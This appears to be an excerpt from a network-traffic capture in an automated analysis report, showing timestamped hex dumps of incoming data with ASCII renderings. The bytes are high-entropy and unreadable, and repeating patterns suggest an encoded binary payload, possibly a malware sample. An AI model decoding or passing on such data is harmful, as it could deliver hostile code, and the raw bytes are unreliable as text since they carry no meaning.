                                                                                                                  2023-08-29 17:16:41 UTC164INData Raw: 9e 07 b0 5b b5 6f 70 46 dd 61 e6 64 ab 5e b1 8c 6e 92 88 62 5d 31 f8 77 5d 13 fc f6 b1 2d 89 dc 59 6f 01 37 61 55 3a 1f 51 9b 70 5f de 19 81 77 07 7d b0 22 52 75 e1 bf 73 2d 99 37 7a 34 c5 4a 55 2e 5a 4d fc 6f b1 22 4e 9b 31 96 5f 19 bf 07 b5 7e f5 54 1d 18 b3 5c a5 2b 8a d5 54 11 b3 e4 5f 6a 3a 94 29 6f 3a 90 13 32 11 59 5d 50 31 4d 28 61 b0 4d 03 2d a1 ff df 62 35 a4 dd 7d 19 47 1d 62 34 bc bc 6d b0 23 4b 2c d0 43 f5 7d be d3 86 cc 0d 19 bd 65 95 a9 d4 63 11 4f bd 68 b0 54 5d ee d4 5b 5d 49 5e 5b 5f 7d d7 fe 51 6c 11 55 28 4f 30 57 a3 4d 94 13 5d 19 b9 d6 59 93 f1 b7 5d 18 ba 04 b5 35 f3 0d de 0d b6 01 b5 64 f1 56 04 6d d7 a0 1b 61 b9 56 0a 19 b3 33 59 4b 3c 1f 5c e4 bf dc 5d 23 a9 1e d8 92 38 19 59 6d cf 47 0a 3d e2 bf b3 38 b0 15 7a e4 f4 5b b6 5e 32
                                                                                                                  Data Ascii: [opFad^nb]1w]-Yo7aU:Qp_w}"Rus-7z4JU.ZMo"N1_~T\+T_j:)o:2Y]P1M(aM-b5}Gb4m#K,C}ecOhT][]I^[_}QlU(O0WM]Y]5dVmaV3YK<\]#8YmG=8z[^2
                                                                                                                  2023-08-29 17:16:41 UTC168INData Raw: c6 16 3a 33 9f 8e 3f 7f 90 32 ea dd 0d c4 57 a0 e2 70 51 91 7e 4e 05 ad ed cc 58 7c 99 e0 fe 54 e6 88 19 bf bd c4 06 d4 a7 bf 0b 35 ba 4b da fb 68 9e 10 e4 cf 45 44 e4 ef a9 82 ba e1 5e 21 7f a8 32 51 f2 2a e5 43 f3 e5 c2 ea 13 71 de 5c fc 66 01 d8 74 fd b3 fd 74 bf 5c 11 5d 72 de 91 e4 6f c2 95 e4 06 cd 8a b9 e5 7a 00 76 c7 7d 11 d7 d6 06 8a 0d 5e de 11 c2 be 26 f5 24 de e7 7c fc e4 0b 11 f7 32 df 0d bf d6 83 15 70 9f e0 d0 fb 66 0f 75 fd 3e c1 21 35 c6 0c 51 a7 9c c1 a3 b2 c4 4a 33 80 db 7f 0e c3 9d ab 02 2c 8d 25 19 a2 05 33 80 c6 2c c0 29 b0 65 cd 61 fc ae 31 4c 04 b3 da 81 77 90 c6 01 fb 68 b8 5a fa e5 de ea f0 5f c0 c6 c7 3f e5 35 b1 e5 bf 0f 11 11 65 61 5f e1 99 91 71 24 c1 85 35 70 45 7d 84 95 ca f6 33 6c 95 52 80 e2 44 06 d4 aa 4a c1 80 d4 3d 01
                                                                                                                  Data Ascii: :3?2WpQ~NX|T5KhED^!2Q*Cq\ftt\]rozv}^&$|2pfu>!5QJ3,%3,)ea1LwhZ_?5ea_q$5pE}3lRDJ=
                                                                                                                  2023-08-29 17:16:41 UTC172INData Raw: 0b ee 56 a9 b5 79 bd 8f 0c 2f 74 07 c8 0b 30 31 5d 61 42 95 04 34 3a 19 51 6d 47 94 59 19 bf d4 94 69 b1 3d 5f e4 ff 5b d0 2b a5 4f 02 86 9d 07 79 7d 90 48 0a 85 7d d6 88 bf 21 47 14 68 05 e7 55 ec 9d 53 b6 77 31 77 51 65 b5 bc 5b 65 31 9a 58 7d b2 d4 3b 69 b1 b6 2c 44 f7 5f d4 6b f0 79 9c 61 31 ec 7c 3d 11 47 0a d2 51 86 c0 23 a9 57 d6 aa 3c 7b 14 e6 ff 47 5d e0 a5 1e 6e a4 3b cb 74 6d 4d 6f 1e 6d f0 df 45 e7 b1 cb 57 7e 88 14 5d e5 28 55 be 0d b3 17 de 94 b2 2b be 2d 77 57 7d ee 71 53 0d 6d 4e 97 2b 61 f1 07 b5 0c b1 45 9f 6d bf 5f 9d 6d 71 06 9d 6d 8b a8 2b 69 e4 97 5d 2a 75 57 6b dd b1 6c bf 2b db 57 39 36 77 56 7d e6 f7 43 5d f4 46 ac de ad a2 16 0d 61 e0 bf bd 0b c0 1f 1b 79 e2 ce dd 33 46 a9 0f 3c 59 46 5c 7a f1 93 6d ab b1 5d dd 4d d5 dc 5b aa 03
                                                                                                                  Data Ascii: Vy/t01]aB4:QmGYi=_[+Oy}H}!GhUSw1wQe[e1X};i,D_kya1|=GQ#W<{G]n;tmMomEW~](U+-wW}qSmN+aEm_mqm+i]*uWkl+W96wV}C]Fay3F<YF\zm]M[
                                                                                                                  2023-08-29 17:16:41 UTC176INData Raw: 25 0f f8 f1 6e ce e1 eb 66 c2 8c 34 a7 87 01 f4 60 ca c0 1f e8 76 49 f4 a6 8a 01 74 8d ca fc 37 ad 31 75 d0 e1 a4 41 74 ef de 08 75 ec 26 05 74 46 4d c5 e4 2e ce 54 7f 01 4d ed e8 66 83 01 f8 be fd da a2 1b 0f 81 d4 ba 09 44 10 e1 4e 0c 7d b0 ce e9 80 e4 47 5c 18 2b 8b 01 0b fd 25 0a 74 88 31 01 e4 2a 8b ed f5 ed c2 b9 f4 6d ce 01 f4 68 06 74 e5 1b 0b 01 b4 98 c6 38 f1 35 e0 47 f4 ed ba 05 74 a0 31 81 9e ed cd 8a 35 b3 ed c7 df 2e ce 75 d9 a5 ba 20 bc 99 db 81 33 e8 a6 2d b2 ed d8 40 e7 69 d3 6d b4 ef 27 24 f6 ed 4e 10 d6 19 ce 05 34 06 de 02 f6 ad 25 23 f3 ee cc 81 7f a8 4e 30 e4 99 ce 27 77 15 ee 75 ec 6e 36 01 c4 99 c4 82 0c ad bb ba f4 64 bb f1 1f f8 09 44 04 dc 4e 0f f4 06 c2 01 f6 ec ef ea f7 2d 47 5c 04 57 ce 06 75 ce 8e 33 e4 ce 04 be f4 6d cb 3a
                                                                                                                  Data Ascii: %nf4`vIt71uAtu&tFM.TMfDN}G\+%t1*mht85Gt15.u 3-@im'$N4%#N0'wun6dDN-G\Wu3m:
                                                                                                                  2023-08-29 17:16:41 UTC180INData Raw: 8f ee 4c 47 52 6d 2c 95 17 4e 60 1d 18 e4 b7 47 bd ec d1 c5 dc 90 b1 53 5d 6d b1 2b be 3e db 57 0a 85 31 52 0b 6d b1 d4 99 61 d1 ca 5d 6e 72 6c a5 1e aa d7 d2 6f 49 b7 5b 92 3c 10 55 e4 b6 c7 9a 2a b5 a7 dd 6c 30 90 dc 7b 71 bc 81 e6 77 bc 7a cf 26 b7 5b 25 4e 42 41 ad ac d6 a3 0c a4 23 51 62 e7 f0 7f 0e 18 08 03 30 ea 97 9e 3b 3a 23 79 65 b5 51 9d c0 b0 14 5b 54 84 17 16 29 b1 22 07 65 b1 4f fe 4c b0 13 55 4d 51 56 d6 6f bf b7 55 e4 b9 dc 5b e6 ff d1 59 4d a4 7e 57 33 72 d4 50 6f 83 46 1e dc e2 01 d6 cf 91 00 de 13 b7 47 bd 46 30 b2 de 08 4d 57 d0 69 0f 47 dd 42 0a 57 ad 52 b1 53 dc 52 90 40 28 54 3a 94 35 cc f1 73 5d 6e f7 47 7f 42 e1 d4 4d 6d 34 97 29 72 32 58 a2 92 e1 5a 1d 40 f7 17 74 61 51 56 59 6d 8a 90 2b 6e 38 29 51 92 b1 12 a1 92 fc 5f 29 60 30
                                                                                                                  Data Ascii: LGRm,N`GS]m+>W1Rma]nrloI[<U*l0{qwz&[%NBA#Qb0;:#yeQ[T)"eOLUMQVoU[YM~W3rPoFGF0MWiGBWRSR@(T:5s]nGBMm4)r2XZ@taQVYm+n8)Q_)`0
                                                                                                                  2023-08-29 17:16:41 UTC184INData Raw: ab 9e 02 7d ec 60 00 f0 29 c2 0d 1d 80 be 01 85 f8 36 66 fb 62 cc 39 84 f1 4d f9 91 e2 43 97 b5 6c f4 f9 ac e2 41 ed 74 ed c1 85 70 79 bf 00 1c ae c1 85 c5 bc cb 21 e3 9d fe 01 98 6e 26 0d fb fd 4b 1f f0 ed ce 2c b1 11 fe 09 fc 98 cd 11 f8 6e b3 f9 0b ef 70 11 ac 92 ba 02 7f 98 36 0c 26 fc 2a f1 f1 fc cc 11 fc b4 45 81 3c 64 83 f5 fb 69 d4 d1 f0 ed 4b c8 81 e4 45 0c a0 a6 8a 45 f4 cd cf c6 b1 39 5f 40 7f ed 0f 8a 22 a3 4b d3 fb 69 88 f1 24 ed 9f 37 fb 69 28 91 f4 ad 8e 41 1f 0a 09 44 34 fc cc 81 e0 2e ee 51 e5 ad 9e 07 f4 60 73 05 40 10 ee 45 89 19 c1 8c 39 28 0c 44 0c 5d db 01 1d eb 6f 02 03 e5 8d 82 f3 9c c6 75 cf 05 b9 91 fc bd 4a 8c 71 9c cd 51 1c ca 97 e3 fb ed 47 44 04 68 0e 7c c6 2a ca 44 3c 1c cb ea dd 6e 26 5b f4 99 fc 82 1c e4 ba c4 bc 65 c1 85
                                                                                                                  Data Ascii: }`)6fb9MClAtpy!n&K,np6&*E<diKEE9_@"Ki$7i(AD4.Q`s@E9(D]ouJqQGDh|*D<n&[e
                                                                                                                  2023-08-29 17:16:41 UTC188INData Raw: a2 92 b1 31 dc 0b bd a0 a6 5e 71 57 04 e4 b7 de 1b 65 38 11 5f 69 53 ed 0c 3c e2 01 d6 58 bd bb 72 bd 8d 37 e6 5e 6a de 00 6d 49 de 00 91 3b 50 61 0c b1 23 47 51 c3 23 52 51 c6 1f 52 e8 93 77 6d d4 b0 b7 7e 86 b1 5b 6e a4 32 99 5c 86 b9 13 e4 64 91 56 de a3 b3 37 2d e7 e1 10 5c 2a 8b f7 2f 8e 91 5f 66 7d 62 58 d9 b6 70 1a e3 ad 32 57 a5 39 ce 25 29 0d 32 bf 5d 46 c5 12 de 85 a8 23 6b 6d 32 bf 53 19 ad 1f 52 e8 b3 fb ad 6c 88 0a a1 62 34 f4 4c ed b1 90 18 91 31 53 5d ee 78 7f 7d 86 06 15 5c e3 f8 56 4d 86 b1 f5 ab ac f1 22 20 ee 78 57 1d 86 29 a1 9c 6f c4 24 5d ee 50 a9 de 8b 4d d4 94 65 b3 d6 93 fd 18 57 b6 ef 09 57 5d 7d b1 57 d8 a5 c4 0e 7d 66 79 be 2f 92 31 40 b5 0f b1 23 15 25 c5 79 de 85 ba 57 29 7f 32 bf 5b 18 f1 a1 5d a8 71 22 66 ed 7c 17 b4 6f e2
                                                                                                                  Data Ascii: 1^qWe8_iS<Xr7^jmI;Pa#GQ#RQRwm~[n2\dV7-\*/_f}bXp2W9%)2]F#km2SRlb4L1S]x}\VM" xW)o$]PMeWW]}W}fy/1@#%yW)2[]q"f|o
                                                                                                                  2023-08-29 17:16:41 UTC192INData Raw: db 89 3b 25 9e ca 8b 35 ed 25 05 7e 2f 44 d0 ce 3d ce 76 d5 e2 78 d3 fb 5b 3e 01 df 1f 88 8a 3e 66 0c 82 f4 0c c9 b2 f5 2c 26 02 26 ed 2d 8c b0 e8 52 09 ec af ce 4f 81 05 fc d3 1f 59 c1 41 42 25 44 d1 7f 2c c3 3d 1f ed 55 81 cb ed c1 85 f5 e9 cd 01 73 ec 4a 02 7d 90 c2 8a 89 ed c6 8a 81 39 31 4c 08 ba ce fe 81 01 47 74 24 05 9d 00 f4 f0 97 58 77 90 2e 01 80 ed c0 8a b1 19 31 4c 00 68 ce c1 fb 69 52 01 f4 ed 31 21 b1 11 99 e9 ee ec f2 f9 0b ed 97 88 b1 01 ba 7f 7f 25 ca 6b f5 ed aa 5b fb 53 93 e9 f4 3e 2c 8a 3c 2c 37 02 fb ed 70 4d f9 71 fd ca 71 3c ce 75 94 6d b3 f3 f4 98 9c 01 74 90 24 01 80 ac 45 0c f4 6d e9 45 f4 65 8b c9 fb ed 78 c1 02 a9 8f 00 74 99 dc 0c f6 ca 05 02 74 db 46 44 3d ed 31 34 04 c9 8a 01 79 a8 ce c9 a4 60 8b c3 a4 05 7f 81 ca ed ce 67
                                                                                                                  Data Ascii: ;%5%~/D=vx[>>f,&&-ROYAB%D,=UsJ}91LGt$Xw.1LhiR1!%k[S>,<,7pMqq<umt$EmEexttFD=14y`g
                                                                                                                  2023-08-29 17:16:41 UTC196INData Raw: b6 2d b3 64 9d 32 ef 0c 3c f4 e2 c3 0b 3a 91 67 00 cc b3 2b 1e 6d b7 57 62 e6 f4 5b 5e ae 28 7c 5d af 3a a7 d6 28 b9 86 a3 4d 4e 63 ad e0 8d 17 5c 7d 4e 57 6d 85 f7 7a 5d 6d e8 d2 5d ad e8 22 57 e6 fc 47 de 6d 76 53 d4 54 5a 5c 20 6b b1 19 d4 18 bd bc 5e e0 ef 17 5c 56 ec 5b 23 d0 71 5d 00 a9 72 a8 df 5e 59 51 90 8c d1 75 70 6d 59 54 aa b5 aa 97 1d ce a3 e7 bc 6f 5f 9b 7d 12 59 54 04 64 f0 55 de 48 f0 4e 5d 2d 32 6a 7c 2c b2 57 04 ce 19 d6 6b 61 76 1b 58 c1 51 57 dc 35 5a 46 f9 64 e9 51 5b ac b2 96 5f 07 b0 3f 5b b9 9b 15 dd 71 d5 57 75 cc f0 67 ab a9 b1 56 29 64 47 93 5f 19 b5 17 f5 6a c4 50 de 48 d0 55 5d 68 f2 e2 25 4d ad a8 28 65 59 b7 5c 8d 83 0e d6 9d 3c 12 d5 07 a9 2f 0d cc 10 5b 9c 62 d7 72 58 71 41 52 bc 4b 71 cf 39 4b be d3 4e 22 51 69 bd 69 b1
                                                                                                                  Data Ascii: -d2<:g+mWb[^(|]:(MNc\}NWmz]m]"WGmvSTZ\ k^\V[#q]r^YQupmYTo_}YTdUHN]-2j|,WkavXQW5ZFdQ[_?[qWugV)dG_jPHU]h%M(eY\</[brXqARKq9KN"Qii
                                                                                                                  2023-08-29 17:16:41 UTC200INData Raw: 60 9d 81 cf a0 3f 86 b1 ef 36 71 ae 60 ca 89 a4 05 4d 83 bd ac c3 82 30 f5 f5 f2 e4 e7 fe 09 1c 29 43 80 fb 19 cc 8a b1 6c 8e 03 72 bd 98 56 1c fa 9c 02 b6 11 fe 1e bc 64 fb 89 85 78 90 1d 57 69 ae 01 e4 f8 ff a2 b9 f5 45 01 b1 f9 9d 57 77 cc ce 8a 80 98 de f0 d7 2a 9c 0a 85 95 ee 21 7d ed f9 82 33 e9 47 7c f8 6d ce 39 d6 98 8a 8b a4 ec 8e 01 74 17 ec 75 dd 69 1c 75 f4 c8 c1 b7 26 1b 4c a0 bd 6d 87 01 f0 99 c2 fe f5 0d 6e 81 f2 67 de 89 e2 ab 8e b3 f4 ff 1b b3 f4 06 00 c3 f4 e9 4e 27 70 ed 88 00 f0 ab 8e ea b7 ff cf 03 f1 0f cf 8b e4 ad c1 b7 2e e9 38 82 bd e9 cb 8b ec 65 d0 23 b2 bd c8 21 80 e4 9e 07 fd 6d ce fb fd 98 02 85 26 98 cd 09 bc 06 c6 a3 f0 8b 31 01 77 ed ab 19 f4 6d f6 01 fb 69 1c e1 84 e7 44 11 45 ef cb 70 f6 ad bf 1b 05 9f cf c9 84 ec 07 0a
                                                                                                                  Data Ascii: `?6q`M0)ClrVdxWiEWw*!}3G|m9tuiu&LmngN'p.8e#!m&1wmiDEp
                                                                                                                  2023-08-29 17:16:41 UTC204INData Raw: 78 ce 00 56 66 aa b1 22 09 54 cc 5b 29 74 88 d3 60 f5 51 57 29 7c 59 80 0d 53 b4 d7 56 53 14 02 66 b2 be d2 51 6c f0 3d 59 85 13 62 a2 92 8a 15 9a ee b2 23 82 e4 89 64 5e 18 ab 44 fd 6c 36 f3 5c 2f b5 93 d4 55 51 7c 28 65 3a 6a 2c 6f 11 43 cd 7a b9 5f b5 bd 00 79 ad 34 34 a1 5d 34 cd 14 de 52 b1 23 63 6c d1 d3 6f 92 85 e0 d0 51 06 43 b5 91 71 54 04 2c b0 5c d6 2a b1 53 1b e4 b6 d4 9a 69 5a 17 ad e6 77 96 bd 6f 11 7f a1 75 59 5e 04 8d b0 e7 db 19 8d bc 5f 58 90 93 59 da 5a 65 d8 b6 b1 22 27 e8 47 2a 5f 9a 6f 5f d0 69 04 f6 8e 3d e6 bf bc 4f e9 24 5f 62 35 17 bf aa b9 de dd 61 01 d4 39 dd b5 57 5f 66 f1 d4 20 61 b1 23 1b cc b9 9c 9f ce d0 70 0d 85 62 63 0d 6f 93 5e 19 19 9f 27 5c 3b 59 f5 1d 3d 3a 57 9b 34 9a 12 55 34 b2 12 5d 95 31 77 5d 2d 46 8c 46 4d 6a
                                                                                                                  Data Ascii: xVf"T[)t`QW)|YSVSfQl=Yb#d^Dl6\/UQ|(e:j,oCz_y44]4R#cloQCqT,\*SiZwouY^_XYZe"'G*_o_i=O$_b5a9W_f a#pbco^'\;Y=:W4U4]1w]-FFMj
                                                                                                                  2023-08-29 17:16:41 UTC208INData Raw: f5 ce 67 7d b5 c6 ea bf 60 77 03 f5 ed 82 88 a9 11 45 cb 35 6d 27 14 35 0d c5 0a 3c ed 8e 01 ff a0 32 c0 16 e6 47 49 f4 e9 47 11 71 23 bb 1c 7f ed de 02 3d 66 14 c0 1f f2 8e 0a 2d 60 c2 13 7d ec b0 80 f4 2a 31 fe f4 ed 45 ca 1f ed 11 8a b9 e1 c5 ce 92 64 ce 49 fc b2 90 5a 3d 2e a4 01 f6 05 b0 66 0b 12 97 c2 f4 66 8a 25 f0 bb f5 04 34 ed 85 48 f4 9e 94 8a 3c 6e ce e1 eb 2c 37 04 7f e1 43 01 34 a7 87 01 79 b9 0f 05 f4 67 82 c0 f0 1b 0f 00 80 ed f0 8b 35 53 ce 81 f4 ed cc 24 f4 ee ce 38 80 c9 c2 74 f4 e8 4e e0 8b 06 c3 80 88 ed ea 0d f4 ad ce 01 81 fc ce 81 3d 6d 39 d9 ef 2d 46 01 fe 8b eb 01 34 ee 08 5f f4 2e 09 04 9c c1 88 01 e2 c4 ce 2e 1f e7 cd 0a fd 6d cb 82 3c ed 31 5f 37 be fd da cd f0 ce 31 c4 ab ce 57 a3 98 8c 01 9c 19 89 42 f4 12 db ad f4 dc 8d 01
                                                                                                                  Data Ascii: g}`wE5m'5<2GIGq#=f-`}*1EdIZ=.ff%4H<n,7C4yg5S$8tN=m9-F4_..m<1_71WB
                                                                                                                  2023-08-29 17:16:41 UTC212INData Raw: 4b 2d 95 d7 0e bd ee 09 94 ae 71 04 59 ad 06 d5 55 73 c4 97 e1 2c 0b 96 d6 6d bd 5c 0d 85 b5 71 21 2a 0d 04 08 5e 5c 01 5d 54 9c 53 01 24 b1 00 29 6d cb dc 01 49 a5 04 b5 eb f0 17 99 2d e1 bf d2 7d 33 3e 66 6d 44 0e 29 0c e2 01 b5 0d b1 c1 a2 92 db 56 0b 85 ea 5d 87 2c d6 47 5d 7b fa 6e 70 f5 90 d6 fb 25 3a 6a c5 6d a9 02 08 6d db a8 0e 38 db 56 a2 ba b1 dc ad 56 44 23 70 e0 b5 47 6b 3d 59 1d 5c 7c 59 0e d8 fd 5c 23 40 3b 70 50 37 6d b0 5f dc ad 90 59 37 6d e4 bf 10 ed 9d 50 df d1 70 d6 5e d9 ec 0c 9e ee 8c d7 c1 25 f8 57 5d 19 9e 16 eb 6d 8a 13 79 65 c6 72 d7 65 b1 d3 94 19 ae 58 eb a4 47 57 dc cc f8 1e 5d 69 c5 5b 1f 2d b0 51 29 65 31 6f dd ab f1 73 b6 b4 b6 a7 0c 3c 31 a7 6e 92 31 6e 20 65 c5 03 37 50 30 1b 59 fc 9d 54 6f 9a e8 23 1f 54 91 22 55 19 8c
                                                                                                                  Data Ascii: K-qYUs,m\q!*^\]TS$)mI-}3>fmD)V],G]{np%:jmm8VVD#pGk=Y\|Y\#@;pP7m_Y7mPp^%W]myereXGW]i[-Q)e1os<1n1n e7P0YTo#T"U
                                                                                                                  2023-08-29 17:16:41 UTC216INData Raw: e0 ab 23 9f 59 c4 72 84 8c fe 09 98 88 04 67 44 a9 a0 b1 fc 9b a7 51 fb 1c c4 00 2d ea 87 6f 95 9d be 73 9b fd be 73 9d 8c 0e 10 bd c2 81 01 d4 8e a1 6f 80 9f a1 6d 85 ed f3 64 86 8c 6f 11 c3 e5 ee 00 9a 92 8d 3d cb ec 4e 3c c4 e1 30 09 41 d2 ff 08 bd 90 bf 51 90 a8 d9 30 fe 2d 81 09 f5 dc c5 74 30 8e a6 a4 fe ed 87 6c 65 e4 ee 49 f3 5c c1 f1 f7 5f c5 64 8c 84 bd 75 f2 9e f7 17 36 ef 9b 6f 9f 83 a1 93 83 aa da 43 95 5d c9 65 90 9d 82 01 87 ed 9e 64 86 80 a7 72 36 9e 9f 1c 90 88 a0 68 86 f5 7f 06 34 88 a0 6e 81 8a a6 72 e6 1c c7 46 c2 e8 ee 0d 44 a6 af 73 9d 8d d8 74 f2 83 16 1f 86 f8 ad 69 9d 81 aa 7b d4 4d c7 62 34 e8 6e 11 46 eb 1c 19 90 ad ab 72 97 9f a7 71 34 e1 ce 91 b1 95 ab 62 65 a1 a3 60 84 eb 1f 35 fd ac bc 66 54 e1 bd d5 eb 5e ec 1c cf e2 ee a1
                                                                                                                  Data Ascii: #YrgDQ-ossomdo=N<0AQ0-t0leI\_du6oC]edr6h4nrFDsti{Mb4nFrq4be`5fT^
                                                                                                                  2023-08-29 17:16:41 UTC220INData Raw: 5d 92 be 57 52 6d be 57 52 6d be 57 52 6d be 57 52 6d 4e 58 5d 62 b1 58 5d 62 b1 58 5d 62 b1 58 5d 62 b1 a8 52 6d be 57 52 6d be 57 52 6d be 57 52 6d be 57 a2 62 b1 58 5d 62 b1 58 5d 62 b1 58 5d 62 b1 58 5d 92 be 57 52 6d be 57 52 6d be 57 52 6d be 57 52 6d 4e 58 5d 62 b1 58 5d 62 b1 58 5d 62 b1 58 5d 62 b1 a8 52 6d be 57 52 6d be 57 52 6d be 57 52 6d be 57 a2 62 b1 58 5d 62 b1 58 5d 62 b1 58 5d 62 b1 58 5d 92 be 57 52 6d be 57 52 6d be 57 52 6d be 57 52 6d 4e 58 5d 62 b1 58 5d 62 b1 58 5d 62 b1 58 5d 62 b1 48 52 6d be 57 52 6d be 57 5d 6d 11 ed 5f 6d 9d 55 eb 26 f3 57 e2 95 03 15 9b 6e ea 1b 9a 6f b4 57 5c ad b1 fd 59 ad b1 5a 9d 6d 99 97 5d 14 71 57 57 01 b1 52 18 6d b4 87 51 6d b1 57 2c 4b b1 57 09 1e b1 57 5d 90 e8 56 5d 95 bc 53 5d 6d 58 7e 51 6d 0d
                                                                                                                  Data Ascii: ]WRmWRmWRmWRmNX]bX]bX]bX]bRmWRmWRmWRmWbX]bX]bX]bX]WRmWRmWRmWRmNX]bX]bX]bX]bRmWRmWRmWRmWbX]bX]bX]bX]WRmWRmWRmWRmNX]bX]bX]bX]bHRmWRmW]m_mU&WnoW\YZm]qWWRmQmW,KWW]V]S]mX~Qm
                                                                                                                  2023-08-29 17:16:41 UTC224INData Raw: 8c 81 bc 10 a2 53 65 eb 47 48 61 f4 5b ae 00 9f 0d cb e1 14 eb 94 28 94 ed 29 e0 e1 0d cc cf 94 ec 7e 6a 15 df ae 02 18 8d cc 35 94 ef 2f 3f 1f 98 ae 01 76 8d ce b7 14 ec 2f 70 15 f7 96 dc 94 e9 eb e0 ad 8c 89 61 f7 12 af 4f 14 ed 90 2f 15 f4 ae 00 95 89 2f 62 75 0d cf ba a1 8d ce 99 94 ec 1b e1 f4 64 2e 01 85 b8 aa 0c 3f 0d ca 7c 14 ed 2a e1 f5 5c 63 61 f5 a8 2f 10 14 ee c2 61 f5 73 ae 00 8e 1d 2e 03 92 09 45 60 f1 0c 48 60 a5 1f 9b 61 f4 cb 2e 02 0c 0d ce ec 14 ef 5d b4 94 ed 51 61 f4 67 af 29 94 ef 72 61 f4 47 7c e1 f7 73 2e 01 64 8d ce 63 94 ed 34 e3 94 ed 46 e1 f7 8c c8 e0 98 8c 81 60 c2 07 1c e1 f4 ac 2e 03 b4 0c 4d 61 f4 8c fb d7 02 8c e5 e1 f6 4a ae 00 07 8c 97 65 63 47 a1 61 f6 2f 2e 00 c8 8d cf 81 94 ed 75 e0 52 0c da 39 94 ef 2f 57 15 e3 0d e0
                                                                                                                  Data Ascii: SeGHa[()~j5/?v/paO//bud.?|*\ca/as.E`H`a.]Qag)raG|s.dc4F`.MaJecGa/.uR9/W
                                                                                                                  2023-08-29 17:16:41 UTC228INData Raw: 70 6e 65 57 ee 61 d2 38 30 1d c3 32 5d 1e c2 3e 32 03 91 3a 38 b5 c5 3f 32 6d cb 6f 5c 40 84 56 ac 7d b1 36 2e 06 91 31 32 1f 91 57 3c 1f d2 3f 34 1b d4 77 1c 1d b3 3a 38 03 c5 57 a9 6d 9c 54 a8 6d 80 42 70 35 9c 77 36 08 b1 32 2d 4d d0 3b 31 4d d4 77 3b 41 91 7a 05 5d ba 25 34 6d c1 77 3f 18 c5 77 3e 1f 51 3e 29 04 d2 36 cc 6c 00 6d 2c 6c f1 7a 38 15 c5 25 3c 1f ab 32 1d 15 d2 3b 28 09 d4 65 52 1e a1 77 30 0c c5 b7 58 03 d6 77 5d 1d d0 23 29 08 c3 39 2e 6d b1 9c e5 6d d4 2f 3e 01 c4 33 38 6d b1 2f 5d 6d b1 7d 7d 1e c5 57 32 1d c2 77 3c 19 91 78 dd 41 91 7d 77 4d d8 39 5f 8d b0 57 19 03 c8 77 72 6d c6 3e 55 01 d5 7a 5c e5 9c 33 34 1f a1 24 5d 6d c6 57 51 45 d8 31 5d 4d df 38 7d 02 c5 3f 38 6d c3 77 3c 1f d6 24 74 4d b1 24 35 02 c6 77 2b 08 c3 47 2e 04 de
                                                                                                                  Data Ascii: pneWa802]>2:8?2mo\@V}6.12W<?4w:8WmTmBp5w62-M;1Mw;Az]%4mw?w>Q>)6lm,lz8%<2;(eRw0Xw]#)9.mm/>38m/]m}}W2w<xA}wM9_Wwrm>Uz\34$]mWQE1]M8}?8mw<$tM$5w+G.
                                                                                                                  2023-08-29 17:16:41 UTC232INData Raw: 8a cc 23 70 e8 1f 11 96 88 ee 7f 92 9e ba 7b 9b dd ca 66 05 48 3c 07 5e ff 5c 13 80 26 ff 06 77 d8 e6 91 e8 98 ba d0 b4 8c d4 e2 56 4c 0e 09 ba 82 ba f3 d1 ec d5 d5 c4 ae 66 20 b4 c4 ad 6d 81 89 cf 88 9c 2d ab 62 9f 9e bb 6c b5 f2 ee 40 08 84 a8 91 ee 35 fd b5 d1 7e c8 13 d8 7d c4 09 80 9a ab 61 87 89 a7 67 92 92 8e 42 a0 c4 8d 33 c2 9e 3c 5b d4 ed 90 4a 98 93 ab 90 90 f5 c8 e3 da 4d c1 61 f1 fc ca 62 88 82 a0 95 bd 9f da 11 e7 7c cd c1 b4 89 39 a2 e4 48 cd a5 c3 c1 4c 16 ee aa 8d 3e c7 e6 d1 11 e5 6c 8d 45 f7 59 d7 50 d9 83 ab 64 cb 5d 4c 22 ed 8d 45 52 b4 2e ca 58 cc 83 a1 3d 9a c0 8c 3e c3 e3 3d 0c 54 e0 a6 64 c6 95 fe 11 93 84 fe 09 94 cf ff 37 fa c0 ef 30 46 e4 5c 40 92 8b a7 62 7e 84 fe 09 d8 6c 87 22 b8 95 cc 01 2d 7c cc 33 c0 7c cc f5 87 ac f0 47
                                                                                                                  Data Ascii: #p{fH<^\&wVLf m-bl@5~}agB3<[JMab|9HL>lEYPd]L"ER.X=>=Td70F\@b~l"-|3|G
                                                                                                                  2023-08-29 17:16:41 UTC236INData Raw: 59 47 93 b6 56 38 df 3e 25 44 4a 65 d6 bd ba 34 8d 25 31 0a 8e 6a d1 25 6a ed c6 e2 50 8a b0 ae 50 43 b0 42 af 26 c2 5d 3b 6d 91 65 6a 4d f5 32 3e 4d 01 65 6d 5d 84 f5 40 7c 87 25 e0 7a f9 77 70 09 d3 5f 70 19 33 55 70 8d 80 65 70 5f 86 e4 51 dd 3f a4 d1 94 92 3b 70 19 c2 c2 6e 67 4c 5e 6e 7e 30 27 29 40 c9 d5 c3 04 40 c7 69 41 4d 51 2d f1 d0 23 cd 65 c0 3c 2e 6d 9f 79 ef 17 2f 13 af 60 37 55 58 43 a7 4c 34 03 60 55 8a 7d f2 42 5f 9d b2 3f 6f 65 dd f7 d4 99 a6 28 fc 38 25 11 8f 69 c3 5d ec 6c 63 52 7f 2c f7 ba cc 74 e2 c7 44 59 87 13 2d 7c e1 42 8d 5c 51 3a 30 09 d5 2e 5d 6d b0 5b 2c 6d d1 7a 30 00 9c 33 1d 3e 06 47 3f f7 de 57 4b 0c 61 2a 3c 42 c5 3e 1c 6d 46 76 4c 7d a3 34 4a 1f 20 79 2c 65 71 45 5f 6c 80 b7 54 0e dd 22 2f 12 20 7b 7d 45 56 a2 5d 6e a5
                                                                                                                  Data Ascii: YGV8>%DJe4%1j%jPPCB&];mejM2>Mem]@|%zwp_p3Upep_Q?;pngL^n~0')@@iAMQ-#e<.my/`7UXCL4`U}B_?oe(8%i]lcR,tDY-|B\Q:0.]m[,mz03>G?WKa*<B>mFvL}4J y,eqE_lT"/ {}EV]n
